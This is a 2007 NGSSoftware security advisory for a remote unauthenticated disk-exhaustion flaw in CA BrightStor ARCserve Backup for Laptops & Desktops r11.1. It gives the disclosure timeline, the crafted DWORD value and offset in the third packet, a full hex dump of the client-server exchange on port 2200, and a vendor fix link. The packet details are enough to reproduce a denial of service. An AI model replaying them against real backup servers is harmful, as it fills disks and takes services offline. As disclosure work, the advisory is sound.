======= Summary ======= Today: 31 January 2007 Reference: NGS00401 Discover: Mark Litchfield; John Heasman Name: Remote Unauthenticated Resource Exhaustion Mobile BackupService Vendor: Computer Associates Systems Affected: BrightStor ARCserve Backup for Laptops & Desktops r11.1 Risk: Medium Status: Published ======== TimeLine ======== Discovered: 19 June 2006 Released: 19 June 2006 Approved: 19 June 2006 Reported: 22 June 2006 Fixed: 23 January 2007 Published: 30 January 2007 =========== Description =========== By sending a specially crafted series of packets to the LGSERVER.EXE process that listens on TCP port 2200, it is possible to cause LGSERVER.EXE to write very large files to the system disk. In addition, the LGSERVER.EXE process becomes unresponsive until the file has been written. ================= Technical Details ================= Upon every authentication attempt to LGSERVER.EXE a file is created within D:\CA_BABLDdata\Server\data\transfer. This file has an extention of .USX which would take the format of something like (where X is equal to 0-9 or A-F) - RWXXX.usx During the negotiation, within the third packet at HEX address of (DWORD) 0x15 - 0x18, you will normally see the value 0x00 0x00 0x00 0x00 followed by CoreDataDB. When sending this packet the contents are written to this USX file. However, if we pass a DWORD value of 0xff 0xff 0xff 0x7f at the address 0x15-0x18, we write an additional 2,096,153KB NULLS to the USX file. ********************************************************************************************************************* Sample Conversation: Client:- (Packet 1) Raw Data 4e 3d 2c 1b 00 00 00 00 00 00 00 00 00 00 00 00 (N=, ) 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 ( ) Server:- Raw Data 4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00 (N=, ) 00 00 00 00 00 00 00 00 ( ) Server:- Raw Data 4e 3d 2c 1b 00 00 00 00 ff 00 00 00 00 00 00 00 (N=, ) 00 00 00 00 00 00 00 00 ( ) Client:- (Packet 2) Raw Data 4e 3d 2c 1b 00 00 00 00 02 00 00 00 00 00 00 00 (N=, ) 06 00 00 00 ce 03 00 00 52 57 31 42 34 00 ( RW1B4 ) Server:- Raw Data 4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00 (N=, ) 00 00 00 00 00 00 00 00 ( ) Client:- (Packet 3) Raw Data 4e 3d 2c 1b 00 00 00 00 03 00 00 00 00 00 00 00 (N=, ) ce 03 00 00 00 00 00 00 43 6f 72 65 44 61 74 61 ( CoreData) 44 42 00 00 01 00 00 00 00 00 0a 00 ce 03 00 00 (DB ) 00 00 00 00 01 00 00 00 10 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 02 00 00 00 00 00 00 4a 00 00 00 00 00 ( J ) 00 01 4a 02 00 00 00 00 00 00 00 00 00 00 00 00 ( J ) 00 00 4a 02 00 00 00 00 00 00 50 00 00 00 00 00 ( J P ) 00 01 9a 02 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 9a 02 00 00 00 00 00 00 52 00 00 00 00 00 ( R ) 00 01 ec 02 00 00 00 00 00 00 04 00 00 00 00 00 ( ) 00 00 f0 02 00 00 00 00 00 00 52 00 00 00 00 00 ( R ) 00 01 42 03 00 00 00 00 00 00 0c 00 00 00 00 00 ( B ) 00 00 4e 03 00 00 00 00 00 00 14 00 00 00 00 00 ( N ) 00 02 62 03 00 00 00 00 00 00 04 00 00 00 00 00 ( b ) 00 00 66 03 00 00 00 00 00 00 12 00 00 00 00 00 ( f ) 00 02 78 03 00 00 00 00 00 00 04 00 00 00 00 00 ( x ) 00 00 7c 03 00 00 00 00 00 00 0e 00 00 00 00 00 ( | ) 00 02 8a 03 00 00 00 00 00 00 17 00 00 00 00 00 ( ) 00 00 a1 03 00 00 00 00 00 00 11 00 00 00 00 00 ( ) 00 02 b2 03 00 00 00 00 00 00 1c 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 ( ) 00 00 01 00 00 00 03 00 00 00 f0 b4 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 01 00 00 00 04 00 00 00 06 00 43 6f 6e 66 ( Conf) 69 67 06 00 00 00 05 00 00 00 29 9f 07 00 00 00 (ig ) ) 12 92 09 00 00 00 1f 9b 0b 00 00 00 57 92 0d 00 ( W ) 00 00 b6 ad 0f 00 00 00 72 9c 00 00 00 00 00 00 ( r ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 03 00 00 00 06 00 00 00 08 00 55 73 65 72 ( User) 4e 61 6d 65 00 00 00 00 00 00 00 00 00 00 00 00 (Name ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 6d 61 72 6b 03 00 00 00 08 00 00 00 ( mark ) 08 00 50 61 73 73 77 6f 72 64 00 00 00 00 00 00 ( Password ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ( ) 00 00 00 00 00 00 00 00 00 00 6a 86 fb b5 8d 2b ( j +) 1b a4 40 e1 b6 73 03 00 00 00 0a 00 00 00 0a 00 ( @ s ) 55 73 65 72 53 74 61 74 75 73 11 00 00 00 03 00 (UserStatus ) 00 00 0c 00 00 00 08 00 43 6f 64 65 50 61 67 65 ( CodePage) e4 04 00 00 03 00 00 00 0e 00 00 00 04 00 48 6f ( Ho) 73 74 67 73 72 6c 2d 74 65 73 74 2e 67 73 72 6c (stgsrl-test.gsrl) 2d 74 65 73 74 2e 6e 65 74 03 00 00 00 10 00 00 (-test.net ) 00 07 00 56 65 72 73 69 6f 6e 31 31 2e 31 2e 37 ( Version11.1.7) 34 32 3a 57 69 6e 64 6f 77 73 20 53 65 72 76 65 (42:Windows Serve) 72 20 32 30 30 33 (r 2003) Client:- (Packet 4) Raw Data 4e 3d 2c 1b 00 00 00 00 04 00 00 00 00 00 00 00 (N=, ) 00 00 00 00 00 00 00 00 ( ) Server:- Raw Data 4e 3d 2c 1b 00 00 00 00 fe 00 00 00 00 00 00 00 (N=, ) 00 00 00 00 00 00 00 00 ( ) =============== Fix Information =============== http://supportconnectw.ca.com/public/sams/lifeguard/infodocs/babldimpsec-notice.asp NGSSoftware Insight Security Research http://www.ngssoftware.com http://www.databasesecurity.com/ http://www.nextgenss.com/ +44(0)208 401 0070 -- E-MAIL DISCLAIMER The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy. NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402